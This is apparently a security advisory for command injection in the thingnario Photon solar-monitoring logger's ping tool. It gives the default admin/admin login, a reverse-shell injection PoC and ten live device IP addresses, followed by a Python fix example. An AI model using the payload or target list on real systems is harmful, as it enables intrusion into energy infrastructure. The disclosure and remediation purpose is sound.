@GroundCTL2MajorTom
Created October 17, 2023 12:05
advisory_thingnario_photon

[CVE ID] CVE-2023-46055
[PRODUCT] thingnario-photon
[VERSION] 1.0
[VULN TYPE] Remote Command Execute
[DESCRIPTION]
https://www.thingnario.com/
The thingnario PV Monitoring Solution's Photon product collects data and alerts from solar power plants and immediately sends them to a display platform via an API, so users receive production data and information without delay. It is sold in Taiwan and Southeast Asia. The vulnerability is in the product's data collector (logger). Below is the description of the data collector from the official website, in which the default password is exposed.
https://thingnario-service.zendesk.com/hc/zh-tw/articles/13402230828185-%E5%A6%82%E4%BD%95%E5%B0%87%E8%B3%87%E6%96%99%E8%92%90%E9%9B%86%E5%99%A8%E8%A8%AD%E5%AE%9A%E7%82%BA%E5%9B%BA%E5%AE%9AIP-
[image]
This vulnerability allows an attacker to enter the backend using the commonly known weak password admin/admin on the "thingnario Logger Maintenance Webpage", which can be found via fofa/shodan. The ping function in the backend application does not validate, filter or escape user-supplied input; it passes the input directly to the underlying system command execution. An attacker can use this ping function to inject commands.
[image]
[image]
PoC: click "Network Setting" ---> "ping tool" and input "127.0.0.1|" or "127.0.0.1 &&" followed by the command you want to execute (for example: 127.0.0.1|bash -i >& /dev/tcp/IP/port 0>&1)
living_example_url: http://106.105.138.247 http://61.216.165.68 http://60.248.238.201 http://60.249.195.163 http://61.221.229.121 http://210.61.177.216 http://210.61.177.215 http://59.125.208.240 http://211.75.227.175 http://211.72.95.251
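The following Python is an added illustration, not code from thingnario or from the advisory author, of how a backend "ping tool" can avoid the flaw described above: the target is accepted only if it parses as an IP literal or a plain hostname (so the "|" and "&&" inputs from the PoC are rejected), and ping is invoked with an argument vector instead of a shell command line. The function names and the hostname pattern are assumptions made for this example.

```python
"""Added example (hypothetical handler, not thingnario's code): validating a
user-supplied ping target and running ping without a shell.

Assumptions: the web handler receives the target as a string and invokes the
system ping binary; function names here are hypothetical.
"""
import ipaddress
import re
import subprocess
from typing import List

# Plain hostname: dot-separated labels of letters, digits and hyphens, no label
# starting or ending with a hyphen (RFC 1123 shape). Spaces and shell
# metacharacters such as | & ; $ ` and newlines never match.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def validate_ping_target(target: str) -> str:
    """Return the target if it is an IPv4/IPv6 literal or a plain hostname.

    Raise ValueError for anything else, which includes the PoC inputs
    "127.0.0.1|..." and "127.0.0.1 && ...".
    """
    if not isinstance(target, str) or not target:
        raise ValueError("empty ping target")
    try:
        # ip_address() accepts only a bare address literal, nothing appended.
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError("invalid ping target: %r" % (target,))


def is_valid_ping_target(target: str) -> bool:
    """Boolean wrapper around validate_ping_target for callers and tests."""
    try:
        validate_ping_target(target)
        return True
    except ValueError:
        return False


def build_ping_argv(target: str, count: int = 3) -> List[str]:
    """Build the ping command as an argument vector.

    With a list and shell=False, the target reaches ping as one argument and
    is never parsed by /bin/sh. The validator also rejects a leading hyphen,
    so the target cannot be mistaken for a ping option.
    """
    safe_target = validate_ping_target(target)
    if not 1 <= count <= 10:
        raise ValueError("count out of range")
    return ["ping", "-c", str(count), safe_target]


def run_ping(target: str, count: int = 3) -> subprocess.CompletedProcess:
    """Validated ping: argv list, shell=False, bounded runtime."""
    argv = build_ping_argv(target, count)
    return subprocess.run(
        argv, shell=False, capture_output=True, text=True, timeout=15
    )


if __name__ == "__main__":
    for candidate in ["127.0.0.1", "example.com", "127.0.0.1|id", "127.0.0.1 && id"]:
        print("%-20s -> %s" % (candidate, "accepted" if is_valid_ping_target(candidate) else "rejected"))
```

The key design choice is that validation is an allow-list (address literal or hostname shape) rather than a deny-list of metacharacters, and that the shell is removed from the call path entirely; either measure alone would have blocked the injection described in the advisory, and together they also cover inputs a deny-list might miss.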
